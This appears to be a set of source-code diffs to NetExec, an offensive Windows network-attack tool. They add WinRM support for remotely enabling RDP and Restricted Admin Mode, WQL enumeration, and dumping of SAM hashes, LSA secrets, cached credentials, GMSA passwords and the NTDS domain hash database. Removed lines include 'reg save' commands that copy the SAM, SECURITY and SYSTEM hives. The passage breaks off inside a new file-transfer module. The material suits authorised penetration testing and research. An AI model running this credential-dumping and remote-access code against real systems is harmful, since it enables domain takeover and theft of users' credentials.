         nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=smb ACTION={enable, disable, enable-ram, disable-ram}
         nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=wmi ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}
+        nxc winrm 192.168.1.1 -u {user} -p {password} -M rdp -o ACTION={enable, disable, enable-ram, disable-ram}
         """
         if "ACTION" not in module_options:
             context.log.fail("ACTION option not specified!")
@@ -67,6 +68,17 @@ class NXCModule:
             self.oldSystem = True
 
     def on_admin_login(self, context, connection):
+        if context.protocol == "winrm":
+            winrm_rdp = RdpWinrm(context, connection)
+            try:
+                if "ram" in self.action:
+                    winrm_rdp.rdp_ram_wrapper(self.action)
+                else:
+                    winrm_rdp.rdp_wrapper(self.action)
+            except Exception as e:
+                context.log.fail(f"Enable RDP via winrm error: {e!s}")
+            return
+
         # Preparation for wmi protocol
         if self.method == "smb":
             context.log.info("Executing over SMB(ncacn_np)")
@@ -101,8 +113,7 @@ class NXCModule:
                             context.log.fail("Looks like target system version is under NT6, please add 'OLD=true' in module options.")
                         else:
                             context.log.fail(str(e))
-                if wmi_rdp._RdpWmi__dcom is not None:
-                    wmi_rdp._RdpWmi__dcom.disconnect()
+                wmi_rdp._RdpWmi__dcom.disconnect()
 
 
 class RdpSmb:
@@ -223,14 +234,6 @@ class RdpWmi:
         self.__aesKey = connection.aesKey
         self.__timeout = timeout
 
-        self.__dcom = None
-        if self.__currentprotocol == "wmi":
-            # The wmi protocol already holds an authenticated IWbemLevel1Login:
-            # reuse it instead of creating a second DCOMConnection to the same
-            # target (whose disconnect would clash with the protocol's own)
-            self.__iWbemLevel1Login = connection.iWbemLevel1Login
-            return
-
         try:
             self.__dcom = DCOMConnection(
                 self.__target,
@@ -345,3 +348,77 @@ class RdpWmi:
             self.logger.success("Enable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")
         elif out.uValue is None:
             self.logger.success("Disable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")
+
+
+class RdpWinrm:
+    def __init__(self, context, connection):
+        self.context = context
+        self.connection = connection
+        self.logger = context.log
+
+    def query_server_name(self):
+        records = self.connection.wql_enumerate(
+            "SELECT ServerName, AllowTSConnections FROM Win32_TerminalServiceSetting",
+            "root\\cimv2\\TerminalServices",
+        )
+        if records:
+            return records[0]
+        return None
+
+    def rdp_wrapper(self, action):
+        record = self.query_server_name()
+        if not record:
+            self.logger.fail("Could not find Win32_TerminalServiceSetting over WinRM")
+            return
+        allow = 1 if action == "enable" else 0
+        self.logger.info(f"{'Enabled' if allow else 'Disabled'} RDP services and setting up firewall.")
+        output = self.connection.wmi_invoke(
+            "root\\cimv2\\TerminalServices",
+            "Win32_TerminalServiceSetting",
+            "SetAllowTSConnections",
+            {"AllowTSConnections": allow, "ModifyFirewallException": 1},
+            selector={"ServerName": record["ServerName"]},
+        )
+        if output.get("ReturnValue") == "0":
+            self.logger.success(f"{'Enable' if allow else 'Disable'} RDP via WinRM(WSMan) successfully")
+        else:
+            self.logger.fail(f"SetAllowTSConnections returned {output.get('ReturnValue')}")
+
+        if action == "enable":
+            self.query_rdp_port()
+
+    def query_rdp_port(self):
+        output = self.connection.wmi_invoke(
+            "root\\default",
+            "StdRegProv",
+            "GetDWORDValue",
+            {"hDefKey": 2147483650, "sSubKeyName": "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp", "sValueName": "PortNumber"},
+        )
+        if output.get("ReturnValue") == "0":
+            self.logger.success(f"RDP Port: {output.get('uValue')}")
+
+    def rdp_ram_wrapper(self, action):
+        subkey = "SYSTEM\\CurrentControlSet\\Control\\Lsa"
+        if "enable" in action:
+            self.logger.info("Enabling Restricted Admin Mode.")
+            output = self.connection.wmi_invoke(
+                "root\\default", "StdRegProv", "SetDWORDValue",
+                {"hDefKey": 2147483650, "sSubKeyName": subkey, "sValueName": "DisableRestrictedAdmin", "uValue": 0},
+            )
+        else:
+            self.logger.info("Disabling Restricted Admin Mode (Clear).")
+            output = self.connection.wmi_invoke(
+                "root\\default", "StdRegProv", "DeleteValue",
+                {"hDefKey": 2147483650, "sSubKeyName": subkey, "sValueName": "DisableRestrictedAdmin"},
+            )
+
+        result = self.connection.wmi_invoke(
+            "root\\default", "StdRegProv", "GetDWORDValue",
+            {"hDefKey": 2147483650, "sSubKeyName": subkey, "sValueName": "DisableRestrictedAdmin"},
+        )
+        if result.get("uValue") == "0":
+            self.logger.success("Enable RDP Restricted Admin Mode via WinRM(WSMan) successfully")
+        elif result.get("uValue") is None:
+            self.logger.success("Disable RDP Restricted Admin Mode via WinRM(WSMan) successfully")
+        else:
+            self.logger.fail(f"DisableRestrictedAdmin is {result.get('uValue')}, action may have failed (ReturnValue {output.get('ReturnValue')})")

--- a/nxc/protocols/winrm.py
+++ b/nxc/protocols/winrm.py
@@ -1,4 +1,5 @@
 import os
+import re
 import contextlib
 import base64
 import traceback
@@ -6,10 +7,12 @@ import requests
 import urllib3
 import logging
 import ntpath
+import xml.etree.ElementTree as ET
 
 from pypsrp.client import Client
 from pypsrp.exceptions import WSManFaultError
 from pypsrp.powershell import RunspacePool
+from pypsrp.wsman import NAMESPACES
 from pypsrp.shell import WinRS
 from pypsrp.powershell import PSDataStreams
 from termcolor import colored
@@ -20,7 +23,7 @@ from impacket.examples.secretsdump import LocalOperations, LSASecrets, SAMHashes
 from impacket.uuid import bin_to_string
 
 from nxc.config import process_secret, host_info_colors
-from nxc.connection import connection
+from nxc.connection import connection, requires_admin
 from nxc.helpers.bloodhound import add_user_bh
 from nxc.helpers.logger import highlight
 from nxc.helpers.misc import gen_random_string
@@ -293,6 +296,128 @@ class winrm(connection):
             else:
                 self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(self.nthash)} {e!s}")
             return False
+
+    def wmi_query(self, wql=None, namespace=None):
+        """Run a WQL query natively over WS-Management and print the results.
+
+        The query is sent as a wsman:Filter with the Microsoft WQL dialect and
+        executed server-side (projection and WHERE included) - no PowerShell
+        process is spawned on the target and no DCOM access is needed,
+        matching the smb/wmi protocols --wmi-query behavior.
+
+        Permissions: WinRM authentication creates a network-type logon
+        session, and two layers gate WMI over WS-Management for it: the
+        WinRM service WMI plugin only serves Administrators, Interactive
+        and Remote Management Users (network logons lack the Interactive
+        group), and the namespace itself requires Remote Enable for
+        network contexts (Administrators by default) - hence the
+        requires_admin gate.
+        """
+        if not wql:
+            wql = self.args.wmi_query.strip("\n")
+        if not namespace:
+            namespace = self.args.wmi_namespace
+
+        try:
+            records = self.wql_enumerate(wql, namespace)
+        except WSManFaultError as e:
+            # a missing namespace or class, a bad WQL syntax, or access
+            # denied: the fault carries the reason, print it instead of
+            # dumping a traceback through the module layer
+            self.logger.fail(f"WMI query fault (code {e.code}): {e}")
+            return []
+        for record in records:
+            for k, v in record.items():
+                self.logger.highlight(f"{k} => {v}")
+        if not records:
+            self.logger.highlight("No entries found")
+        # Same record format the smb/wmi protocols return ({prop: {"value": ...}})
+        # so modules built on connection.wmi_query work unchanged over winrm
+        return [{k: {"value": v} for k, v in record.items()} for record in records]
+
+    @requires_admin
+    def wql_enumerate(self, wql, namespace):
+        """Run a WQL query natively over WS-Management, returning the records.
+
+        Raises WSManFaultError when the server rejects the query (e.g. access
+        denied) and authentication/transport errors as-is.
+        """
+        records = []
+        wsen, wsmn = NAMESPACES["wsen"], NAMESPACES["wsman"]
+        namespace_path = namespace.replace("\\", "/")
+        resource_uri = f"http://schemas.microsoft.com/wbem/wsman/1/wmi/{namespace_path}/*"
+        # https://learn.microsoft.com/en-us/windows/winrm/winrm-scripting-shell?tabs=filter-1
+        wql_dialect = "http://schemas.microsoft.com/wbem/wsman/1/WQL"
+
+        def parse_items(res):
+            items = []
+            for element in res.iter():
+                if not element.tag.endswith("}Items"):
+                    continue
+                for instance in element:
+                    props = {}
+                    for prop in instance:
+                        name = prop.tag.split("}")[-1]
+                        if name in props:
+                            # multi-valued WMI property arrives as repeated elements
+                            if not isinstance(props[name], list):
+                                props[name] = [props[name]]
+                            props[name].append(prop.text)
+                        elif prop.text is None and len(prop) == 1:
+                            # unwrap nested single-child values (e.g. InstallDate
+                            # arrives as <InstallDate><Datetime>...</Datetime>) and
+                            # normalize ISO datetimes to the DMTF format the DCOM
+                            # protocols return (2026-09-05T20:16:36.503745+08:00
+                            # -> 20260905201636.503745+480)
+                            text = prop[0].text
+                            match = re.match(r"(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2}):(\d{2})(?:\.(\d+))?(?:([+-])(\d{2}):(\d{2}))?", text or "")
+                            if match:
+                                year, month, day, hour, minute, second, fraction, sign, tz_h, tz_m = match.groups()
+                                value = f"{year}{month}{day}{hour}{minute}{second}"
+                                if fraction:
+                                    value += f".{fraction[:6]}"
+                                if sign:
+                                    value += f"{sign}{int(tz_h) * 60 + int(tz_m)}"
+                                props[name] = value
+                            else:
+                                props[name] = text
+                        else:
+                            props[name] = prop.text
+                    items.append(props)
+            return items
+
+        def find_context(res):
+            for element in res.iter():
+                if element.tag.endswith("}EnumerationContext") and element.text and element.text.strip():
+                    return element.text.strip()
+            return None
+
+        enum_msg = ET.Element(f"{{{wsen}}}Enumerate")
+        wql_filter = ET.SubElement(enum_msg, f"{{{wsmn}}}Filter")
+        wql_filter.set("Dialect", wql_dialect)
+        wql_filter.text = wql
+        ET.SubElement(enum_msg, f"{{{wsmn}}}OptimizeEnumeration")
+        ET.SubElement(enum_msg, f"{{{wsmn}}}MaxElements").text = "32000"
+
+        self.logger.info(f"Executing WQL syntax: {wql}")
+        res = self.conn.wsman.enumerate(resource_uri=resource_uri, resource=enum_msg)
+
+        records.extend(parse_items(res))
+
+        # Pull the remaining pages until the server sends EndOfSequence
+        context = find_context(res)
+        while context:
+            pull_msg = ET.Element(f"{{{wsen}}}Pull")
+            context_element = ET.SubElement(pull_msg, f"{{{wsen}}}EnumerationContext")
+            context_element.text = context
+            ET.SubElement(pull_msg, f"{{{wsen}}}MaxElements").text = "32000"
+            res = self.conn.wsman.pull(resource_uri, pull_msg)
+            records.extend(parse_items(res))
+            if any(element.tag.endswith("}EndOfSequence") for element in res.iter()):
+                break
+            context = find_context(res)
+
+        return records
 
     def execute(self, payload=None, get_output=False, shell_type="cmd"):
         if not payload:

--- a/nxc/protocols/winrm.py
+++ b/nxc/protocols/winrm.py
@@ -1,14 +1,16 @@
 import os
+import contextlib
 import base64
 import traceback
 import requests
 import urllib3
 import logging
 import ntpath
-import xml.etree.ElementTree as ET
 
-from pypsrp.wsman import NAMESPACES
 from pypsrp.client import Client
+from pypsrp.exceptions import WSManFaultError
+from pypsrp.powershell import RunspacePool
+from pypsrp.shell import WinRS
 from pypsrp.powershell import PSDataStreams
 from termcolor import colored
 
@@ -141,17 +143,61 @@ class winrm(connection):
         return False
 
     def check_if_admin(self):
-        wsman = self.conn.wsman
-        wsen = NAMESPACES["wsen"]
-        wsmn = NAMESPACES["wsman"]
+        """Set admin_privs from a WinRM service configuration read.
 
-        enum_msg = ET.Element(f"{{{wsen}}}Enumerate")
-        ET.SubElement(enum_msg, f"{{{wsmn}}}OptimizeEnumeration")
-        ET.SubElement(enum_msg, f"{{{wsmn}}}MaxElements").text = "32000"
+        Only administrators can read the WinRM configuration, and the
+        request answers in milliseconds on both paths. It doubles as the
+        first authenticated WSMan request of the session, so an
+        authentication error here fails the login.
+        """
+        try:
+            self.conn.wsman.get("http://schemas.microsoft.com/wbem/wsman/1/config")
+            self.admin_privs = True
+        except WSManFaultError:
+            self.admin_privs = False
 
-        wsman.enumerate("http://schemas.microsoft.com/wbem/wsman/1/windows/shell", enum_msg)
-        self.admin_privs = True
-        return True
+        # A shell type requested on the command line (-x runs a cmd shell,
+        # -X a PowerShell runspace) is counted as working without probing:
+        # the execution itself confirms it, and a failure is reported loudly.
+        shell_checks = {
+            "cmd": not getattr(self.args, "execute", None),
+            "powershell": not getattr(self.args, "ps_execute", None),
+        }
+        self.shell_types = [t for t in ("cmd", "powershell") if not shell_checks[t] or self.probe_shell(t)]
+        return self.admin_privs
+
+    def probe_shell(self, shell_type):
+        """Open and immediately close a shell to check the endpoint access.
+
+        No command is executed: the shell create alone is denied when the
+        account lacks the right. Authentication errors still fail the login,
+        only a WSMan fault counts as no access.
+        """
+        shell = None
+        try:
+            if shell_type == "cmd":
+                shell = WinRS(self.conn.wsman)
+            else:
+                shell = RunspacePool(self.conn.wsman)
+            shell.open()
+            return True
+        except WSManFaultError as e:
+            self.logger.debug(f"{shell_type} shell not accessible: {e}")
+            return False
+        finally:
+            if shell is not None:
+                with contextlib.suppress(Exception):
+                    shell.close()
+
+    def mark_shell_access(self):
+        if not self.shell_types:
+            return ""
+        if len(self.shell_types) == 2:
+            shell_type = "all"
+        else:
+            shell_type = f"{self.shell_types[0]} only"
+        prefix = " - " if self.admin_privs else " "
+        return f"{prefix}{highlight(f'Shell access! ({shell_type})')}"
 
     def plaintext_login(self, domain, username, password):
         # Add server hostname to the Workstation field in NTLM Authenticate Message (Message 3)

--- a/nxc/protocols/winrm.py
+++ b/nxc/protocols/winrm.py
@@ -1,7 +1,8 @@
 import os
 import re
-import contextlib
+import binascii
 import base64
+import contextlib
 import traceback
 import requests
 import urllib3
@@ -9,24 +10,28 @@ import logging
 import ntpath
 import xml.etree.ElementTree as ET
 
-from pypsrp.client import Client
 from pypsrp.exceptions import WSManFaultError
-from pypsrp.powershell import RunspacePool
-from pypsrp.wsman import NAMESPACES
+from pypsrp.wsman import NAMESPACES, SelectorSet
+from pypsrp.client import Client
+from Cryptodome.Hash import MD4
+
+from pypsrp.powershell import PSDataStreams, RunspacePool
 from pypsrp.shell import WinRS
-from pypsrp.powershell import PSDataStreams
 from termcolor import colored
 
 from dploot.lib.utils import is_guid, is_credfile
 from impacket.dpapi import MasterKeyFile, MasterKey, CredHist, DomainKey, CredentialFile, deriveKeysFromUser, DPAPI_BLOB, CREDENTIAL_BLOB
-from impacket.examples.secretsdump import LocalOperations, LSASecrets, SAMHashes
+from impacket.examples.secretsdump import LSASecrets, SAMHashes, NTDSHashes
 from impacket.uuid import bin_to_string
 
 from nxc.config import process_secret, host_info_colors
 from nxc.connection import connection, requires_admin
 from nxc.helpers.bloodhound import add_user_bh
 from nxc.helpers.logger import highlight
-from nxc.helpers.misc import gen_random_string
+from nxc.helpers.misc import validate_ntlm
+from nxc.protocols.winrm.file_transfer import FileTransfer
+from nxc.protocols.winrm.remoteops import RemoteOperations
+from nxc.protocols.ldap.gmsa import MSDS_MANAGEDPASSWORD_BLOB
 from nxc.helpers.negotiate_parser import parse_challenge
 from nxc.logger import NXCAdapter
 from nxc.paths import TMP_PATH
@@ -46,6 +51,9 @@ class winrm(connection):
         self.challenge_header = None
         self.targetDomain = None
         self.no_ntlm = False
+        self.shell_types = []
+        self._remote_ops = None
+        self._file_transfer = None
 
         connection.__init__(self, args, db, host)
 
@@ -222,7 +230,7 @@ class winrm(connection):
             )
 
             self.check_if_admin()
-            self.logger.success(f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}")
+            self.logger.success(f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}{self.mark_shell_access()}")
 
             self.logger.debug(f"Adding credential: {domain}/{self.username}:{self.password}")
             self.db.add_credential("plaintext", domain, self.username, self.password)
@@ -275,7 +283,7 @@ class winrm(connection):
             )
 
             self.check_if_admin()
-            self.logger.success(f"{self.domain}\\{self.username}:{process_secret(nthash)} {self.mark_pwned()}")
+            self.logger.success(f"{self.domain}\\{self.username}:{process_secret(nthash)} {self.mark_pwned()}{self.mark_shell_access()}")
 
             self.db.add_credential("hash", domain, self.username, ntlm_hash)
             user_id = self.db.get_credential("hash", domain, self.username, ntlm_hash)
@@ -297,6 +305,66 @@ class winrm(connection):
                 self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(self.nthash)} {e!s}")
             return False
 
+    def wmi_invoke(self, namespace, class_name, method, params=None, selector=None):
+        """Invoke a WMI method natively over WS-Management (ExecMethod).
+
+        The method INPUT body is sent in the class resource URI namespace with
+        the parameters as child elements, and the target instance is addressed
+        by a selector on the class key property - the WinRM-equivalent of the
+        smb/wmi protocols calling WMI methods over DCOM. Parameter names must
+        match the class schema (not always the MSDN documentation, e.g.
+        Win32_TerminalServiceSetting.SetAllowTSConnections takes
+        AllowTSConnections, not Allow). No PowerShell process is involved.
+        """
+        namespace_path = namespace.replace("\\", "/")
+        class_uri = f"http://schemas.microsoft.com/wbem/wsman/1/wmi/{namespace_path}/{class_name}"
+        body = ET.Element(f"{{{class_uri}}}{method}_INPUT")
+        for name, value in (params or {}).items():
+            ET.SubElement(body, f"{{{class_uri}}}{name}").text = str(value)
+
+        selector_set = None
+        if selector:
+            selector_set = SelectorSet()
+            for key, value in selector.items():
+                selector_set.add_option(key, value)
+
+        res = self.conn.wsman.invoke(f"{class_uri}/{method}", class_uri, body, selector_set=selector_set)
+        return self.parse_method_output(res)
+
+    @staticmethod
+    def parse_method_output(res):
+        """Flatten a WSMan method output body into a {property: text} dict."""
+        output = {}
+        for element in res.iter():
+            if element.tag.endswith("_OUTPUT"):
+                for prop in element:
+                    output[prop.tag.split("}")[-1]] = prop.text
+        return output
+
+    @requires_admin
+    def list_snapshots(self):
+        drive = self.args.list_snapshots
+        self.logger.info(f"Retrieving volume shadow copies of drive {drive}.")
+        snapshots = self.wql_enumerate(
+            "SELECT ID, DeviceObject, ClientAccessible, InstallDate FROM Win32_ShadowCopy",
+            "root\\cimv2",
+        )
+        if not snapshots:
+            self.logger.info("No volume shadow copies found.")
+            return
+
+        self.logger.highlight(f"{'Drive':<8}{'Shadow Copy ID':<40}{'ClientAccessible':<18}{'InstallDate':<27}{'Device Object':<50}")
+        self.logger.highlight(f"{'------':<8}{'--------------':<40}{'----------------':<18}{'-----------':<27}{'-------------':<50}")
+        for record in snapshots:
+            self.logger.highlight(
+                f"{drive:<8}"
+                f"{record.get('ID') or '':<40}"
+                f"{str(record.get('ClientAccessible', '')).capitalize() if record.get('ClientAccessible') else '':<18}"
+                f"{record.get('InstallDate') or '':<27}"
+                f"{record.get('DeviceObject') or '':<50}"
+            )
+
+    @requires_admin
     def wmi_query(self, wql=None, namespace=None):
         """Run a WQL query natively over WS-Management and print the results.
 
@@ -480,12 +548,11 @@ class winrm(connection):
         # Do a bit of smart handling for the local file path
         if local_path.endswith("/"):
             local_path += ntpath.basename(remote_path)
-        try:
-            self.logger.display(f'Downloading "{remote_path}" to "{local_path}"')
-            self.conn.fetch(remote_path, local_path)
+        self.logger.display(f'Downloading "{remote_path}" to "{local_path}"')
+        if self.file_transfer.get_file(remote_path, local_path):
             self.logger.success(f"File {remote_path} has been saved to {local_path}")
-        except Exception as e:
-            self.logger.fail(f"Failed to get file {remote_path}, error: {e!s}")
+        else:
+            self.logger.fail(f"Failed to get file {remote_path}")
 
     def put_file(self, local_path=None, remote_path=None):
         local_path = local_path if local_path else self.args.put_file[0]
@@ -507,74 +574,196 @@ class winrm(connection):
             for line in out.splitlines():
                 self.logger.highlight(line.rstrip())
 
-    # Dos attack prevent:
-    # if someboby executed "reg save HKLM\sam C:\windows\temp\sam" before, but didn't remove "C:\windows\temp\sam" file,
-    # when user execute the same command next time, in tty shell, the prompt will ask "File C:\windows\temp\sam already exists. Overwrite (Yes/No)?"
-    # but in here, it isn't not a tty shell, pypsrp will do a crazy loop command execution when it didn't get any response (stuck in "Yes/No" prompt)
-    # and it will make target host OOM error just like dos attack.
-    # To prevent that, just make the store file name randomly.
+    @property
+    def remote_ops(self):
+        if self._remote_ops is None:
+            self._remote_ops = RemoteOperations(self, shadow_id=self.args.use_snapshot_id)
+        return self._remote_ops
+
+    @property
+    def file_transfer(self):
+        if self._file_transfer is None:
+            self._file_transfer = FileTransfer(self)
+        return self._file_transfer
+
+    @requires_admin
     def sam(self):
-        sam_storename = gen_random_string(6)
-        system_storename = gen_random_string(6)
-        dump_command = f"reg save HKLM\\SAM C:\\windows\\temp\\{sam_storename} && reg save HKLM\\SYSTEM C:\\windows\\temp\\{system_storename}"
-        clean_command = f"del C:\\windows\\temp\\{sam_storename} && del C:\\windows\\temp\\{system_storename}"
+        def add_sam_hash(sam_hash):
+            self.logger.highlight(sam_hash)
+            if "_history" in sam_hash:
+                return
+            username, _, lmhash, nthash, _, _, _ = sam_hash.split(":")
+            add_sam_hash.sam_hashes += 1
+            self.db.add_credential(
+                "hash",
+                self.hostname,
+                username,
+                f"{lmhash}:{nthash}",
+                pillaged_from=host_id,
+            )
+
+        add_sam_hash.sam_hashes = 0
         output_filename = self.output_file_template.format(output_folder="sam")
+
         try:
-            self.conn.execute_cmd(dump_command) if self.args.dump_method == "cmd" else self.conn.execute_ps(f"cmd /c '{dump_command}'")
-            self.conn.fetch(f"C:\\windows\\temp\\{sam_storename}", output_filename + ".sam")
-            self.conn.fetch(f"C:\\windows\\temp\\{system_storename}", output_filename + ".system")
-            self.conn.execute_cmd(clean_command) if self.args.dump_method == "cmd" else self.conn.execute_ps(f"cmd /c '{clean_command}'")
-        except Exception as e:
-            if ("does not exist" in str(e)) or ("TransformFinalBlock" in str(e)):
-                self.logger.fail("Failed to dump SAM hashes, it may have been detected by AV or current user is not privileged user")
-            elif hasattr(e, "code") and e.code == 5:
-                self.logger.fail(f"Dump SAM hashes with {self.args.dump_method} failed, please try '--dump-method'")
-            else:
-                self.logger.fail(f"Failed to dump SAM hashes, error: {e!s}")
-        else:
-            self.logger.display("Dumping SAM hashes")
-            local_operations = LocalOperations(f"{output_filename}.system")
-            boot_key = local_operations.getBootKey()
+            bootkey = self.remote_ops.get_bootkey(output_filename)
+            if bootkey is None:
+                return
+
+            sam_hive_path = self.remote_ops.shadow_path(r"C:\Windows\System32\config\SAM")
+            if not self.remote_ops.get_file(sam_hive_path, f"{output_filename}.sam"):
+                self.logger.fail("Could not get SAM hive")
+                return
+
+            host_id = self.db.get_hosts(self.host)[0][0]
             SAM = SAMHashes(
                 f"{output_filename}.sam",
-                boot_key,
+                bootkey,
                 isRemote=None,
-                perSecretCallback=lambda secret: self.logger.highlight(secret),
+                history=self.args.history,
+                perSecretCallback=lambda secret: add_sam_hash(secret),
             )
+            self.logger.display("Dumping SAM hashes")
             SAM.dump()
             SAM.export(output_filename)
+            self.logger.success(f"Dumped {highlight(add_sam_hash.sam_hashes)} SAM hashes to {output_filename + '.sam'}")
+        finally:
+            self.remote_ops.finish()
 
+    @requires_admin
     def lsa(self):
-        security_storename = gen_random_string(6)
-        system_storename = gen_random_string(6)
-        dump_command = f"reg save HKLM\\SECURITY C:\\windows\\temp\\{security_storename} && reg save HKLM\\SYSTEM C:\\windows\\temp\\{system_storename}"
-        clean_command = f"del C:\\windows\\temp\\{security_storename} && del C:\\windows\\temp\\{system_storename}"
+        def add_lsa_secret(secret):
+            add_lsa_secret.secrets += 1
+            self.logger.highlight(secret)
+            if "_SC_GMSA_{84A78B8C" in secret:
+                gmsa_id = secret.split("_")[4].split(":")[0]
+                data = bytes.fromhex(secret.split("_")[4].split(":")[1])
+                blob = MSDS_MANAGEDPASSWORD_BLOB()
+                blob.fromString(data)
+                current_password = blob["CurrentPassword"][:-2]
+                ntlm_hash = MD4.new()
+                ntlm_hash.update(current_password)
+                passwd = binascii.hexlify(ntlm_hash.digest()).decode("utf-8")
+                self.logger.highlight(f"GMSA ID: {gmsa_id:<20} NTLM: {passwd}")
+
+        add_lsa_secret.secrets = 0
         output_filename = self.output_file_template.format(output_folder="lsa")
+
         try:
-            self.conn.execute_cmd(dump_command) if self.args.dump_method == "cmd" else self.conn.execute_ps(f"cmd /c '{dump_command}'")
-            self.conn.fetch(f"C:\\windows\\temp\\{security_storename}", f"{output_filename}.security")
-            self.conn.fetch(f"C:\\windows\\temp\\{system_storename}", f"{output_filename}.system")
-            self.conn.execute_cmd(clean_command) if self.args.dump_method == "cmd" else self.conn.execute_ps(f"cmd /c '{clean_command}'")
-        except Exception as e:
-            if ("does not exist" in str(e)) or ("TransformFinalBlock" in str(e)):
-                self.logger.fail("Failed to dump LSA secrets, it may have been detected by AV or current user is not privileged user")
-            elif hasattr(e, "code") and e.code == 5:
-                self.logger.fail(f"Dump LSA secrets with {self.args.dump_method} failed, please try '--dump-method'")
-            else:
-                self.logger.fail(f"Failed to dump LSA secrets, error: {e!s}")
-        else:
-            self.logger.display("Dumping LSA secrets")
-            local_operations = LocalOperations(f"{output_filename}.system")
-            boot_key = local_operations.getBootKey()
+            bootkey = self.remote_ops.get_bootkey(output_filename)
+            if bootkey is None:
+                return
+
+            security_hive_path = self.remote_ops.shadow_path(r"C:\Windows\System32\config\SECURITY")
+            if not self.remote_ops.get_file(security_hive_path, f"{output_filename}.security"):
+                self.logger.fail("Could not get the SECURITY hive")
+                return
+
             LSA = LSASecrets(
                 f"{output_filename}.security",
-                boot_key,
+                bootkey,
                 None,
                 isRemote=None,
-                perSecretCallback=lambda secret_type, secret: self.logger.highlight(secret),
+                perSecretCallback=lambda secret_type, secret: add_lsa_secret(secret),
             )
+            self.logger.display("Dumping LSA secrets")
             LSA.dumpCachedHashes()
+            LSA.exportCached(output_filename)
             LSA.dumpSecrets()
+            LSA.exportSecrets(output_filename)
+            self.logger.success(f"Dumped {highlight(add_lsa_secret.secrets)} LSA secrets to {output_filename + '.secrets'} and {output_filename + '.cached'}")
+        finally:
+            self.remote_ops.finish()
+
+    @requires_admin
+    def ntds(self):
+        host_id = self.db.get_hosts(self.host)[0][0]
+        printed_kerb_keys_banner = False
+
+        def add_hash(secret_type, secret, host_id):
+            nonlocal printed_kerb_keys_banner
+            if self.args.kerberos_keys and not printed_kerb_keys_banner and secret_type == NTDSHashes.SECRET_TYPE.NTDS_KERBEROS:
+                self.logger.display("Kerberos keys:")
+                printed_kerb_keys_banner = True
+
+            # Count the type of secrets
+            if secret_type == NTDSHashes.SECRET_TYPE.NTDS_KERBEROS:
+                add_hash.kerb_secrets += 1
+            else:
+                add_hash.nt_lm_secrets += 1
+
+            # Log the secret based on args
+            if self.args.enabled:
+                if "Enabled" in secret:
+                    secret = " ".join(secret.split(" ")[:-1])
+                    self.logger.highlight(secret)
+            else:
+                secret = " ".join(secret.split(" ")[:-1]) if " " in secret else secret
+                self.logger.highlight(secret)
+
+            # Filter out computer accounts, history hashes and kerberos keys for adding to db
+            if secret.find("$") == -1 and secret_type == NTDSHashes.SECRET_TYPE.NTDS and "_history" not in secret:
+                if secret.find("\\") != -1:
+                    domain, clean_hash = secret.split("\\")
+                else:
+                    domain = self.domain
+                    clean_hash = secret
+
+                try:
+                    username, _, lmhash, nthash, _, _, _ = clean_hash.split(":")
+                    parsed_hash = f"{lmhash}:{nthash}"
+                    if validate_ntlm(parsed_hash):
+                        self.db.add_credential("hash", domain, username, parsed_hash, pillaged_from=host_id)
+                        add_hash.added_to_db += 1
+                        return
+                    raise
+                except Exception:
+                    self.logger.debug("Dumped hash is not NTLM, not adding to db for now ;)")
+            else:
+                self.logger.debug("Dumped hash is a computer account, not adding to db")
+
+        add_hash.nt_lm_secrets = 0
+        add_hash.kerb_secrets = 0
+        add_hash.added_to_db = 0
+        output_filename = self.output_file_template.format(output_folder="ntds")
+        NTDS = None
+
+        try:
+            bootkey = self.remote_ops.get_bootkey(output_filename)
+            if bootkey is None:
+                return
+
+            ntds_file = self.remote_ops.get_ntds(output_filename)
+            if ntds_file is None:
+                return
+
+            NTDS = NTDSHashes(
+                ntds_file,
+                bootkey,
+                isRemote=False,
+                history=self.args.history,
+                noLMHash=True,
+                useVSSMethod=True,
+                justNTLM=not self.args.kerberos_keys,
+                pwdLastSet=False,
+                resumeSession=None,
+                outputFileName=output_filename,
+                justUser=self.args.userntds or None,
+                printUserStatus=True,
+                perSecretCallback=lambda secret_type, secret: add_hash(secret_type, secret, host_id),
+            )
+            self.logger.success("Dumping the NTDS, this could take a while so go grab a redbull...")
+            NTDS.dump()
+            ntds_outfile = f"{output_filename}.ntds"
+            self.logger.success(f"Dumped {highlight(add_hash.nt_lm_secrets)} NTDS hashes to {ntds_outfile} of which {highlight(add_hash.added_to_db)} were added to the database")
+            if self.args.kerberos_keys:
+                self.logger.success(f"Dumped {highlight(add_hash.kerb_secrets)} Kerberos keys to {ntds_outfile}.kerberos")
+            self.logger.display("To extract only enabled accounts from the output file, run the following command: ")
+            self.logger.display(f"grep -iv disabled {ntds_outfile} | cut -d ':' -f1")
+        finally:
+            if NTDS is not None:
+                NTDS.finish()
+            self.remote_ops.finish()
 
     def dpapi(self):
         """

--- a/nxc/protocols/winrm/file_transfer.py
+++ b/nxc/protocols/winrm/file_transfer.py
@@ -1,0 +1,289 @@
+import base64
+import contextlib
+import threading
+import xml.etree.ElementTree as ET
+
+from pypsrp.client import Client
+from pypsrp.exceptions import WinRMTransportError, WSManFaultError
+from pypsrp.wsman import SelectorSet
+
+from nxc.helpers.misc import gen_random_string
+
+PS_MODULE_FILE_URI = "http://schemas.microsoft.com/wbem/wsman/1/wmi/root/Microsoft/Windows/Powershellv3/PS_ModuleFile"
+CIM_DATAFILE_URI = "http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/CIM_DataFile"
+CONFIG_URI = "http://schemas.microsoft.com/wbem/wsman/1/config"
+CONFIG_NS = "http://schemas.microsoft.com/wbem/wsman/1/config"
+DEFAULT_ENVELOPE_KB = 500
+
+# files above this cannot answer a PS_ModuleFile GET with the stock
+# envelope: the base64 in the response would not fit the 500KB limit, and
+# the service envelope is raised for the read instead
+ENVELOPE_FILE_MAX = 375 * 1024
+# reads are sized first: up to SINGLE_READ_MAX one invoke carries the whole
+# file, bigger ones are split in CHUNK_SIZE reads across STREAMS parallel
